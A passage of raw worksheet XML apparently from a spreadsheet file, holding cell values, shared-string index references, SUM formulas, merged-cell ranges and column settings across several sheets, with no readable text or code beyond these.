      <c r="D10" s="80">
        <v>3.0</v>
      </c>
      <c r="E10" s="62">
        <v>5.0</v>
      </c>
      <c r="F10" s="62" t="s">
        <v>3770</v>
      </c>
    </row>
    <row r="11">
      <c r="C11" s="62" t="s">
        <v>3032</v>
      </c>
      <c r="D11" s="80">
        <v>19.0</v>
      </c>
      <c r="E11" s="62">
        <v>38.0</v>
      </c>
      <c r="F11" s="62" t="s">
        <v>3771</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="62" t="s">
        <v>3037</v>
      </c>
      <c r="B12" s="62">
        <f>sum(D12:D13)</f>
        <v>62</v>
      </c>
      <c r="C12" s="62" t="s">
        <v>3038</v>
      </c>
      <c r="D12" s="80">
        <v>42.0</v>
      </c>
      <c r="E12" s="62">
        <v>78.0</v>
      </c>
      <c r="F12" s="62" t="s">
        <v>3772</v>
      </c>
    </row>
    <row r="13">
      <c r="C13" s="62" t="s">
        <v>3042</v>
      </c>
      <c r="D13" s="80">
        <v>20.0</v>
      </c>
      <c r="E13" s="62">
        <v>39.0</v>
      </c>
      <c r="F13" s="62" t="s">
        <v>3773</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="62" t="s">
        <v>3045</v>
      </c>
      <c r="B14" s="62">
        <v>5.0</v>
      </c>
      <c r="C14" s="62" t="s">
        <v>3046</v>
      </c>
      <c r="D14" s="80">
        <v>5.0</v>
      </c>
      <c r="E14" s="62">
        <v>10.0</v>
      </c>
      <c r="F14" s="62" t="s">
        <v>3774</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="10">
    <mergeCell ref="A9:A11"/>
    <mergeCell ref="A12:A13"/>
    <mergeCell ref="A2:A4"/>
    <mergeCell ref="B2:B4"/>
    <mergeCell ref="A5:A6"/>
    <mergeCell ref="B5:B6"/>
    <mergeCell ref="A7:A8"/>
    <mergeCell ref="B7:B8"/>
    <mergeCell ref="B9:B11"/>
    <mergeCell ref="B12:B1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13"/>
    <col customWidth="1" min="2" max="2" width="8.63"/>
    <col customWidth="1" min="3" max="3" width="46.38"/>
    <col customWidth="1" min="5" max="5" width="5.63"/>
    <col customWidth="1" min="6" max="6" width="6.25"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="117"/>
      <c r="B1" s="117"/>
      <c r="C1" s="117"/>
      <c r="D1" s="118" t="s">
        <v>3775</v>
      </c>
      <c r="I1" s="61"/>
      <c r="J1" s="61"/>
      <c r="K1" s="61"/>
      <c r="L1" s="61"/>
      <c r="M1" s="61"/>
      <c r="N1" s="61"/>
      <c r="O1" s="61"/>
      <c r="P1" s="61"/>
      <c r="Q1" s="61"/>
      <c r="R1" s="61"/>
      <c r="S1" s="61"/>
      <c r="T1" s="61"/>
      <c r="U1" s="61"/>
      <c r="V1" s="61"/>
      <c r="W1" s="61"/>
      <c r="X1" s="61"/>
      <c r="Y1" s="61"/>
      <c r="Z1" s="61"/>
    </row>
    <row r="2">
      <c r="A2" s="117" t="s">
        <v>3151</v>
      </c>
      <c r="B2" s="117" t="s">
        <v>3776</v>
      </c>
      <c r="C2" s="117" t="s">
        <v>3777</v>
      </c>
      <c r="D2" s="117" t="s">
        <v>3776</v>
      </c>
      <c r="E2" s="117" t="s">
        <v>3778</v>
      </c>
      <c r="F2" s="117" t="s">
        <v>3779</v>
      </c>
      <c r="G2" s="74" t="s">
        <v>3780</v>
      </c>
      <c r="H2" s="74" t="s">
        <v>3781</v>
      </c>
      <c r="I2" s="61"/>
      <c r="J2" s="61"/>
      <c r="K2" s="61"/>
      <c r="L2" s="61"/>
      <c r="M2" s="61"/>
      <c r="N2" s="61"/>
      <c r="O2" s="61"/>
      <c r="P2" s="61"/>
      <c r="Q2" s="61"/>
      <c r="R2" s="61"/>
      <c r="S2" s="61"/>
      <c r="T2" s="61"/>
      <c r="U2" s="61"/>
      <c r="V2" s="61"/>
      <c r="W2" s="61"/>
      <c r="X2" s="61"/>
      <c r="Y2" s="61"/>
      <c r="Z2" s="61"/>
    </row>
    <row r="3">
      <c r="A3" s="119" t="s">
        <v>2952</v>
      </c>
      <c r="B3" s="119">
        <f>SUm(D3:D5)</f>
        <v>164</v>
      </c>
      <c r="C3" s="62" t="s">
        <v>2953</v>
      </c>
      <c r="D3" s="80">
        <v>9.0</v>
      </c>
      <c r="E3" s="62">
        <v>0.0</v>
      </c>
      <c r="F3" s="62">
        <v>58.0</v>
      </c>
      <c r="G3" s="120">
        <v>13.333333</v>
      </c>
      <c r="H3" s="120">
        <v>19.506409</v>
      </c>
    </row>
    <row r="4">
      <c r="C4" s="62" t="s">
        <v>2960</v>
      </c>
      <c r="D4" s="80">
        <v>25.0</v>
      </c>
      <c r="E4" s="62">
        <v>0.0</v>
      </c>
      <c r="F4" s="62">
        <v>189.0</v>
      </c>
      <c r="G4" s="120">
        <v>42.64</v>
      </c>
      <c r="H4" s="120">
        <v>64.628348</v>
      </c>
    </row>
    <row r="5">
      <c r="C5" s="62" t="s">
        <v>2969</v>
      </c>
      <c r="D5" s="80">
        <v>130.0</v>
      </c>
      <c r="E5" s="62">
        <v>0.0</v>
      </c>
      <c r="F5" s="62">
        <v>1690.0</v>
      </c>
      <c r="G5" s="120">
        <v>88.192308</v>
      </c>
      <c r="H5" s="120">
        <v>247.766272</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="121" t="s">
        <v>2980</v>
      </c>
      <c r="B6" s="121">
        <f>Sum(D6:D7)</f>
        <v>253</v>
      </c>
      <c r="C6" s="121" t="s">
        <v>2981</v>
      </c>
      <c r="D6" s="122">
        <v>135.0</v>
      </c>
      <c r="E6" s="121">
        <v>0.0</v>
      </c>
      <c r="F6" s="121">
        <v>1451.0</v>
      </c>
      <c r="G6" s="123">
        <v>64.718519</v>
      </c>
      <c r="H6" s="123">
        <v>173.693187</v>
      </c>
    </row>
    <row r="7">
      <c r="C7" s="121" t="s">
        <v>2989</v>
      </c>
      <c r="D7" s="122">
        <v>118.0</v>
      </c>
      <c r="E7" s="121">
        <v>0.0</v>
      </c>
      <c r="F7" s="121">
        <v>1185.0</v>
      </c>
      <c r="G7" s="123">
        <v>99.483051</v>
      </c>
      <c r="H7" s="123">
        <v>202.023555</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="119" t="s">
        <v>3000</v>
      </c>
      <c r="B8" s="119">
        <f>Sum(D8:D9)</f>
        <v>62</v>
      </c>
      <c r="C8" s="62" t="s">
        <v>3001</v>
      </c>
      <c r="D8" s="80">
        <v>34.0</v>
      </c>
      <c r="E8" s="62">
        <v>0.0</v>
      </c>
      <c r="F8" s="62">
        <v>1141.0</v>
      </c>
      <c r="G8" s="120">
        <v>103.117647</v>
      </c>
      <c r="H8" s="120">
        <v>226.318596</v>
      </c>
    </row>
    <row r="9">
      <c r="C9" s="62" t="s">
        <v>3008</v>
      </c>
      <c r="D9" s="80">
        <v>28.0</v>
      </c>
      <c r="E9" s="62">
        <v>0.0</v>
      </c>
      <c r="F9" s="62">
        <v>2788.0</v>
      </c>
      <c r="G9" s="120">
        <v>175.821429</v>
      </c>
      <c r="H9" s="120">
        <v>527.483337</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="121" t="s">
        <v>3014</v>
      </c>
      <c r="B10" s="121">
        <f>sum(D10:D12)</f>
        <v>61</v>
      </c>
      <c r="C10" s="121" t="s">
        <v>3015</v>
      </c>
      <c r="D10" s="122">
        <v>39.0</v>
      </c>
      <c r="E10" s="121">
        <v>0.0</v>
      </c>
      <c r="F10" s="121">
        <v>1684.0</v>
      </c>
      <c r="G10" s="123">
        <v>93.461538</v>
      </c>
      <c r="H10" s="123">
        <v>292.222324</v>
      </c>
    </row>
    <row r="11">
      <c r="C11" s="121" t="s">
        <v>3024</v>
      </c>
      <c r="D11" s="122">
        <v>3.0</v>
      </c>
      <c r="E11" s="121">
        <v>0.0</v>
      </c>
      <c r="F11" s="121">
        <v>98.0</v>
      </c>
      <c r="G11" s="123">
        <v>34.333333</v>
      </c>
      <c r="H11" s="123">
        <v>55.193599</v>
      </c>
    </row>
    <row r="12">
      <c r="C12" s="121" t="s">
        <v>3032</v>
      </c>
      <c r="D12" s="122">
        <v>19.0</v>
      </c>
      <c r="E12" s="121">
        <v>0.0</v>
      </c>
      <c r="F12" s="121">
        <v>988.0</v>
      </c>
      <c r="G12" s="123">
        <v>90.052632</v>
      </c>
      <c r="H12" s="123">
        <v>226.411001</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="119" t="s">
        <v>3037</v>
      </c>
      <c r="B13" s="119">
        <f>sum(D13:D14)</f>
        <v>62</v>
      </c>
      <c r="C13" s="62" t="s">
        <v>3038</v>
      </c>
      <c r="D13" s="80">
        <v>42.0</v>
      </c>
      <c r="E13" s="62">
        <v>0.0</v>
      </c>
      <c r="F13" s="62">
        <v>553.0</v>
      </c>
      <c r="G13" s="120">
        <v>49.595238</v>
      </c>
      <c r="H13" s="120">
        <v>101.385538</v>
      </c>
    </row>
    <row r="14">
      <c r="C14" s="62" t="s">
        <v>3042</v>
      </c>
      <c r="D14" s="80">
        <v>20.0</v>
      </c>
      <c r="E14" s="62">
        <v>0.0</v>
      </c>
      <c r="F14" s="62">
        <v>235.0</v>
      </c>
      <c r="G14" s="120">
        <v>21.75</v>
      </c>
      <c r="H14" s="120">
        <v>52.809364</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="121" t="s">
        <v>3045</v>
      </c>
      <c r="B15" s="121">
        <v>5.0</v>
      </c>
      <c r="C15" s="121" t="s">
        <v>3046</v>
      </c>
      <c r="D15" s="122">
        <v>5.0</v>
      </c>
      <c r="E15" s="121">
        <v>6.0</v>
      </c>
      <c r="F15" s="121">
        <v>1672.0</v>
      </c>
      <c r="G15" s="123">
        <v>398.8</v>
      </c>
      <c r="H15" s="123">
        <v>718.644001</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="11">
    <mergeCell ref="A10:A12"/>
    <mergeCell ref="B10:B12"/>
    <mergeCell ref="A13:A14"/>
    <mergeCell ref="B13:B14"/>
    <mergeCell ref="D1:H1"/>
    <mergeCell ref="A3:A5"/>
    <mergeCell ref="B3:B5"/>
    <mergeCell ref="A6:A7"/>
    <mergeCell ref="B6:B7"/>
    <mergeCell ref="A8:A9"/>
    <mergeCell ref="B8:B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5"/>
    <col customWidth="1" min="2" max="2" width="47.63"/>
    <col customWidth="1" min="3" max="3" width="30.38"/>
    <col customWidth="1" min="4" max="4" width="65.63"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="93" t="s">
        <v>2939</v>
      </c>
      <c r="B1" s="93" t="s">
        <v>2941</v>
      </c>
      <c r="C1" s="93" t="s">
        <v>3782</v>
      </c>
      <c r="D1" s="93" t="s">
        <v>3783</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="62" t="s">
        <v>2952</v>
      </c>
      <c r="B2" s="62" t="s">
        <v>2953</v>
      </c>
      <c r="C2" s="62" t="s">
        <v>3784</v>
      </c>
      <c r="D2" s="62" t="s">
        <v>3785</v>
      </c>
    </row>
    <row r="3">
      <c r="B3" s="62" t="s">
        <v>2960</v>
      </c>
      <c r="C3" s="62" t="s">
        <v>3786</v>
      </c>
      <c r="D3" s="62" t="s">
        <v>3787</v>
      </c>
    </row>
    <row r="4">
      <c r="B4" s="62" t="s">
        <v>2969</v>
      </c>
      <c r="C4" s="62" t="s">
        <v>3788</v>
      </c>
      <c r="D4" s="62" t="s">
        <v>3789</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="62" t="s">
        <v>2980</v>
      </c>
      <c r="B5" s="62" t="s">
        <v>2981</v>
      </c>
      <c r="C5" s="62" t="s">
        <v>3790</v>
      </c>
      <c r="D5" s="62" t="s">
        <v>3791</v>
      </c>
    </row>
    <row r="6">
      <c r="B6" s="62" t="s">
        <v>2989</v>
      </c>
      <c r="C6" s="62" t="s">
        <v>3790</v>
      </c>
      <c r="D6" s="62" t="s">
        <v>3792</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="62" t="s">
        <v>3000</v>
      </c>
      <c r="B7" s="62" t="s">
        <v>3001</v>
      </c>
      <c r="C7" s="62" t="s">
        <v>3793</v>
      </c>
      <c r="D7" s="62" t="s">
        <v>3794</v>
      </c>
    </row>
    <row r="8">
      <c r="B8" s="62" t="s">
        <v>3008</v>
      </c>
      <c r="C8" s="62" t="s">
        <v>3788</v>
      </c>
      <c r="D8" s="62" t="s">
        <v>3795</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="62" t="s">
        <v>3014</v>
      </c>
      <c r="B9" s="62" t="s">
        <v>3015</v>
      </c>
      <c r="C9" s="62" t="s">
        <v>3796</v>
      </c>
      <c r="D9" s="62" t="s">
        <v>3797</v>
      </c>
    </row>
    <row r="10">
      <c r="B10" s="62" t="s">
        <v>3024</v>
      </c>
      <c r="C10" s="62" t="s">
        <v>3788</v>
      </c>
      <c r="D10" s="62" t="s">
        <v>3798</v>
      </c>
    </row>
    <row r="11">
      <c r="B11" s="62" t="s">
        <v>3032</v>
      </c>
      <c r="C11" s="62" t="s">
        <v>3793</v>
      </c>
      <c r="D11" s="62" t="s">
        <v>3799</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="62" t="s">
        <v>3037</v>
      </c>
      <c r="B12" s="62" t="s">
        <v>3038</v>
      </c>
      <c r="C12" s="62" t="s">
        <v>3793</v>
      </c>
      <c r="D12" s="62" t="s">
        <v>3800</v>
      </c>
    </row>
    <row r="13">
      <c r="B13" s="62" t="s">
        <v>3042</v>
      </c>
      <c r="C13" s="62" t="s">
        <v>3793</v>
      </c>
      <c r="D13" s="62" t="s">
        <v>3801</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="62" t="s">
        <v>3045</v>
      </c>
      <c r="B14" s="62" t="s">
        <v>3046</v>
      </c>
      <c r="C14" s="62" t="s">
        <v>3788</v>
      </c>
      <c r="D14" s="62" t="s">
        <v>3802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23.38"/>
    <col customWidth="1" min="3" max="3" width="35.63"/>
    <col customWidth="1" min="4" max="4" width="47.5"/>
    <col customWidth="1" min="5" max="5" width="35.0"/>
    <col customWidth="1" min="6" max="6" width="51.88"/>
    <col customWidth="1" min="7" max="7" width="25.0"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="96" t="s">
        <v>116</v>
      </c>
      <c r="B1" s="97" t="s">
        <v>117</v>
      </c>
      <c r="C1" s="124" t="s">
        <v>118</v>
      </c>
      <c r="D1" s="59"/>
      <c r="E1" s="59"/>
      <c r="F1" s="59"/>
      <c r="G1" s="59"/>
      <c r="H1" s="59"/>
      <c r="I1" s="61"/>
      <c r="J1" s="61"/>
      <c r="K1" s="61"/>
      <c r="L1" s="61"/>
      <c r="M1" s="61"/>
      <c r="N1" s="61"/>
      <c r="O1" s="61"/>
    </row>
    <row r="2">
      <c r="A2" s="101">
        <v>4492.0</v>
      </c>
      <c r="B2" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C2" s="125" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="106">
        <v>4531.0</v>
      </c>
      <c r="B3" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C3" s="126" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="101">
        <v>4541.0</v>
      </c>
      <c r="B4" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="125" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="106">
        <v>4573.0</v>
      </c>
      <c r="B5" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C5" s="126" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="101">
        <v>4781.0</v>
      </c>
      <c r="B6" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C6" s="125" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="106">
        <v>4907.0</v>
      </c>
      <c r="B7" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C7" s="126" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="101">
        <v>4910.0</v>
      </c>
      <c r="B8" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C8" s="125" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="106">
        <v>4943.0</v>
      </c>
      <c r="B9" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C9" s="126" t="s">
        <v>205</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="101">
        <v>5028.0</v>
      </c>
      <c r="B10" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C10" s="125" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="106">
        <v>5046.0</v>
      </c>
      <c r="B11" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C11" s="126" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="101">
        <v>5081.0</v>
      </c>
      <c r="B12" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C12" s="125" t="s">
        <v>215</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="106">
        <v>5099.0</v>
      </c>
      <c r="B13" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C13" s="126" t="s">
        <v>222</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="101">
        <v>5478.0</v>
      </c>
      <c r="B14" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C14" s="125" t="s">
        <v>229</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="106">
        <v>5528.0</v>
      </c>
      <c r="B15" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C15" s="126" t="s">
        <v>233</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="101">
        <v>5717.0</v>
      </c>
      <c r="B16" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C16" s="125" t="s">
        <v>237</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="106">
        <v>5882.0</v>
      </c>
      <c r="B17" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C17" s="126" t="s">
        <v>245</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="101">
        <v>5964.0</v>
      </c>
      <c r="B18" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C18" s="125" t="s">
        <v>249</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="106">
        <v>5983.0</v>
      </c>
      <c r="B19" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C19" s="126" t="s">
        <v>252</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="101">
        <v>6049.0</v>
      </c>
      <c r="B20" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C20" s="125" t="s">
        <v>256</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="106">
        <v>6225.0</v>
      </c>
      <c r="B21" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C21" s="126" t="s">
        <v>264</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="101">
        <v>6267.0</v>
      </c>
      <c r="B22" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C22" s="125" t="s">
        <v>268</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="106">
        <v>6309.0</v>
      </c>
      <c r="B23" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C23" s="126" t="s">
        <v>272</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="101">
        <v>6342.0</v>
      </c>
      <c r="B24" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C24" s="125" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="106">
        <v>6362.0</v>
      </c>
      <c r="B25" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C25" s="126" t="s">
        <v>284</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="101">
        <v>6365.0</v>
      </c>
      <c r="B26" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C26" s="125" t="s">
        <v>288</v>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="106">
        <v>6433.0</v>
      </c>
      <c r="B27" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C27" s="126" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="101">
        <v>6460.0</v>
      </c>
      <c r="B28" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C28" s="125" t="s">
        <v>297</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="106">
        <v>6492.0</v>
      </c>
      <c r="B29" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C29" s="126" t="s">
        <v>306</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="101">
        <v>6498.0</v>
      </c>
      <c r="B30" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C30" s="125" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="106">
        <v>6520.0</v>
      </c>
      <c r="B31" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C31" s="126" t="s">
        <v>312</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="101">
        <v>6630.0</v>
      </c>
      <c r="B32" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C32" s="125" t="s">
        <v>315</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="106">
        <v>7063.0</v>
      </c>
      <c r="B33" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C33" s="126" t="s">
        <v>321</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="101">
        <v>7191.0</v>
      </c>
      <c r="B34" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C34" s="125" t="s">
        <v>324</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="106">
        <v>7243.0</v>
      </c>
      <c r="B35" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C35" s="126" t="s">
        <v>327</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="101">
        <v>7264.0</v>
      </c>
      <c r="B36" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C36" s="125" t="s">
        <v>330</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="106">
        <v>7665.0</v>
      </c>
      <c r="B37" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C37" s="126" t="s">
        <v>333</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="101">
        <v>7798.0</v>
      </c>
      <c r="B38" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C38" s="125" t="s">
        <v>336</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="106">
        <v>8202.0</v>
      </c>
      <c r="B39" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C39" s="126" t="s">
        <v>339</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="101">
        <v>8305.0</v>
      </c>
      <c r="B40" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C40" s="125" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="106">
        <v>8641.0</v>
      </c>
      <c r="B41" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C41" s="126" t="s">
        <v>345</v>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="101">
        <v>8777.0</v>
      </c>
      <c r="B42" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C42" s="125" t="s">
        <v>348</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="106">
        <v>8838.0</v>
      </c>
      <c r="B43" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C43" s="126" t="s">
        <v>351</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="101">
        <v>9222.0</v>
      </c>
      <c r="B44" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C44" s="125" t="s">
        <v>357</v>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="106">
        <v>9441.0</v>
      </c>
      <c r="B45" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C45" s="126" t="s">
        <v>363</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="101">
        <v>9472.0</v>
      </c>
      <c r="B46" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C46" s="125" t="s">
        <v>366</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="106">
        <v>9772.0</v>
      </c>
      <c r="B47" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C47" s="126" t="s">
        <v>372</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="101">
        <v>10008.0</v>
      </c>
      <c r="B48" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C48" s="125" t="s">
        <v>379</v>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="106">
        <v>10383.0</v>
      </c>
      <c r="B49" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C49" s="126" t="s">
        <v>393</v>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="101">
        <v>10681.0</v>
      </c>
      <c r="B50" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C50" s="125" t="s">
        <v>396</v>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="106">
        <v>10879.0</v>
      </c>
      <c r="B51" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C51" s="126" t="s">
        <v>399</v>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="101">
        <v>11017.0</v>
      </c>
      <c r="B52" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C52" s="125" t="s">
        <v>402</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="106">
        <v>11130.0</v>
      </c>
      <c r="B53" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C53" s="126" t="s">
        <v>405</v>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="101">
        <v>11523.0</v>
      </c>
      <c r="B54" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C54" s="125" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="106">
        <v>11622.0</v>
      </c>
      <c r="B55" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C55" s="126" t="s">
        <v>426</v>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="101">
        <v>13120.0</v>
      </c>
      <c r="B56" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C56" s="125" t="s">
        <v>435</v>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="106">
        <v>13429.0</v>
      </c>
      <c r="B57" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C57" s="126" t="s">
        <v>438</v>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="101">
        <v>13439.0</v>
      </c>
      <c r="B58" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C58" s="125" t="s">
        <v>441</v>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="106">
        <v>13597.0</v>
      </c>
      <c r="B59" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C59" s="126" t="s">
        <v>444</v>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="101">
        <v>23179.0</v>
      </c>
      <c r="B60" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C60" s="125" t="s">
        <v>514</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="106">
        <v>23345.0</v>
      </c>
      <c r="B61" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C61" s="126" t="s">
        <v>520</v>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="101">
        <v>23415.0</v>
      </c>
      <c r="B62" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C62" s="125" t="s">
        <v>523</v>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="106">
        <v>23790.0</v>
      </c>
      <c r="B63" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C63" s="126" t="s">
        <v>526</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="101">
        <v>24661.0</v>
      </c>
      <c r="B64" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C64" s="125" t="s">
        <v>529</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="106">
        <v>24780.0</v>
      </c>
      <c r="B65" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C65" s="126" t="s">
        <v>532</v>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="101">
        <v>25929.0</v>
      </c>
      <c r="B66" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C66" s="125" t="s">
        <v>535</v>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="106">
        <v>26066.0</v>
      </c>
      <c r="B67" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C67" s="126" t="s">
        <v>538</v>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="101">
        <v>26307.0</v>
      </c>
      <c r="B68" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C68" s="125" t="s">
        <v>544</v>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="106">
        <v>26881.0</v>
      </c>
      <c r="B69" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C69" s="126" t="s">
        <v>547</v>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="101">
        <v>29115.0</v>
      </c>
      <c r="B70" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C70" s="125" t="s">
        <v>553</v>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="106">
        <v>29292.0</v>
      </c>
      <c r="B71" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C71" s="126" t="s">
        <v>556</v>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="101">
        <v>29372.0</v>
      </c>
      <c r="B72" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C72" s="125" t="s">
        <v>559</v>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="106">
        <v>29421.0</v>
      </c>
      <c r="B73" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C73" s="126" t="s">
